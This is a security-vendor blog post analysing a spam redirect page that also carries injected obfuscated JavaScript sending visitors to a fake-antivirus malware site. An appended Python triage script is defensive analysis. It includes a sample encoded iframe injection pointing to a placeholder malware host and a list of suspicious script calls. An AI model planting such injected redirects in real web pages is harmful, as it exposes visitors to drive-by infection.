Who's the quickest? Only one way to find out...

Filed Under: SophosLabs

Earlier on this morning I happened to notice a redirect page used in a meds spam campaign that just happened to also be compromised with a malicious script.

You can see the META tag redirect that will instruct the browser to immediately load the page on the target site.

<META HTTP-EQUIV=REFRESH CONTENT="0; URL=http://[target_site]/">

And immediately below it, the obfuscated JavaScript injected into the page. Deobfuscating this script, we can see its payload is also redirection, this time to a malware site.

Curiosity got the better of me. Which payload 'wins' when the browser loads the page? The META redirect or the JavaScript? Only one way to find out...

Ok, not quite Harry Hill, but I loaded the page with Internet Explorer on a test machine to find out. It appears that the malicious script has precedence over the META redirect, and the iframe payload was delivered. Unfortunately, not a happy ending - infection with rogue security software, pro-actively detected by Sophos as Mal/FakeAV-AD.

Definitely one scenario where you would have been better off with our Canadian Health friends at the end of the META redirect.
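For anyone triaging a page like this one, the following added example (not part of the original post and not Sophos tooling) statically collects both redirect mechanisms, the META refresh target and any URL revealed by one layer of percent-decoding in inline scripts, and flags pages that carry both. The sample HTML and its host names are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed sample: a META refresh plus an injected, percent-encoded script.
SAMPLE = '''<html><head>
<META HTTP-EQUIV=REFRESH CONTENT="0; URL=http://meds.example.invalid/">
</head><body>
<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A//fakeav.example.invalid/%22%3E%3C/iframe%3E"));</script>
</body></html>'''

# Calls commonly seen in injected, obfuscated redirect scripts.
SUSPICIOUS = ("eval(", "unescape(", "document.write(", "fromCharCode")
URL_RE = re.compile(r'''(?:src|href|location)\s*=\s*["']?(https?://[^"'\s>]+)''', re.I)

class RedirectTriage(HTMLParser):
    """Collect every redirect mechanism on a page, not only the META refresh."""
    def __init__(self):
        super().__init__()
        self.meta_refresh = []    # (delay_seconds, url)
        self.script_targets = []  # (url, [indicator strings found in the script])
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.match(r"\s*(\d+)\s*[;,]\s*url\s*=\s*(.+)", a.get("content", ""), re.I)
            if m:
                self.meta_refresh.append((int(m.group(1)), m.group(2).strip("'\" ")))
        self._in_script = tag == "script"

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if not self._in_script:
            return
        hits = [s for s in SUSPICIOUS if s in data]
        decoded = unquote(data)  # one layer of %xx decoding only; nothing is executed
        for url in URL_RE.findall(decoded):
            self.script_targets.append((url, hits))

def triage(html):
    p = RedirectTriage()
    p.feed(html)
    competing = bool(p.meta_refresh) and bool(p.script_targets)
    return {"meta": p.meta_refresh, "script": p.script_targets, "competing": competing}

if __name__ == "__main__":
    print(triage(SAMPLE))
```

A crawler that only follows the META refresh would record the spam site and miss the script target, which is the one the browser in this test actually acted on.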

